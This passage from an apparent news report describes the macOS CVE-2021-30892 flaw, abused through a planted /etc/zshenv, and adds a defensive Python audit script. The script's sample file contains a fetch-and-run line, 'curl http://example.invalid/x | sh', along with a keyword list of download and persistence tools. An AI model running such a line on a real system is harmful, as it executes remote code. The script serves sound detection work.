Apple said it remediated the problem with additional restrictions as part of security updates pushed on October 26, 2021.
Successful exploitation of CVE-2021-30892 could enable a malicious application to modify protected parts of the file system, including the capability to install malicious kernel drivers (aka rootkits), overwrite system files, or install persistent, undetectable malware.
'Interestingly, when zsh starts, it looks for the file /etc/zshenv, and - if found - runs commands from that file automatically, even in non-interactive mode,' Bar Or said. 'Therefore, for attackers to perform arbitrary operations on the device, a fully reliable path they could take would be to create a malicious /etc/zshenv file and then wait for system_installd to invoke zsh.'
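Because zsh sources /etc/zshenv unconditionally, that file is worth auditing on macOS hosts even after the fix is applied. The script below is an added example for defenders, not code from the article or from Microsoft's research: it checks whether the file exists, whether it is a symlink, whether it is owned by root and not group/world writable, records its SHA-256, and flags lines containing commands that rarely belong in a system-wide non-interactive startup file. The assumption that a stock macOS install has no /etc/zshenv, the keyword list, and the `audit_constructed_sample` helper (which writes a constructed sample file to a temp directory) are all illustrative choices of this example.

```python
#!/usr/bin/env python3
"""Audit a zsh startup file such as /etc/zshenv for signs of tampering.

Added example, not part of the original article or Microsoft's research.
Assumption: an unmodified macOS install ships no /etc/zshenv, so its mere
presence is a reason to look closer. Keyword hits are review signals, not
proof of compromise.
"""
import hashlib
import os
import stat
import tempfile

# Constructed, illustrative list: commands that rarely belong in a
# system-wide startup file that runs for every non-interactive zsh.
SUSPICIOUS_TOKENS = (
    "curl ", "wget ", "base64", "nohup", "osascript", "launchctl", "chmod +s",
)


def audit_zshenv(path="/etc/zshenv", expected_uid=0):
    """Return a list of (severity, message) findings for a startup file.

    An empty list means the file is absent, which is the expected state.
    """
    findings = []
    try:
        st = os.lstat(path)  # lstat so a symlink is reported, not followed
    except FileNotFoundError:
        return findings

    if stat.S_ISLNK(st.st_mode):
        findings.append(("high", f"{path} is a symlink"))
        return findings

    findings.append(("info", f"{path} exists ({st.st_size} bytes)"))
    if st.st_uid != expected_uid:
        findings.append(("high", f"{path} owned by uid {st.st_uid}, expected {expected_uid}"))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("high", f"{path} is group/world writable (mode {oct(st.st_mode & 0o777)})"))

    with open(path, "rb") as fh:
        data = fh.read()
    findings.append(("info", f"sha256 {hashlib.sha256(data).hexdigest()}"))

    # Scan non-comment lines for tokens that warrant manual review.
    text = data.decode("utf-8", errors="replace")
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for token in SUSPICIOUS_TOKENS:
            if token in stripped:
                findings.append(("medium", f"line {lineno} contains {token.strip()!r}: {stripped}"))
    return findings


def has_high_findings(findings):
    """True if any finding carries severity 'high'."""
    return any(sev == "high" for sev, _ in findings)


def audit_constructed_sample(world_writable=True):
    """Write a constructed sample startup file to a temp dir and audit it.

    The sample is owned by the current user, so expected_uid is set to the
    current uid; only the permission and content checks are exercised.
    """
    d = tempfile.mkdtemp()
    path = os.path.join(d, "zshenv")
    with open(path, "w") as fh:
        fh.write("# constructed sample, not a real system file\n")
        fh.write("export PATH=/usr/bin:/bin\n")
        fh.write("curl http://example.invalid/x | sh\n")
    os.chmod(path, 0o666 if world_writable else 0o644)
    return audit_zshenv(path, expected_uid=os.getuid())


if __name__ == "__main__":
    for sev, msg in audit_zshenv():
        print(f"[{sev}] {msg}")
```

Run it as root on the hosts you manage (e.g. from an MDM script) and treat any "high" finding, or any unexpected change in the recorded hash, as a ticket to open; the same function works for the other system-wide startup files (/etc/zprofile, /etc/zshrc) by passing a different path.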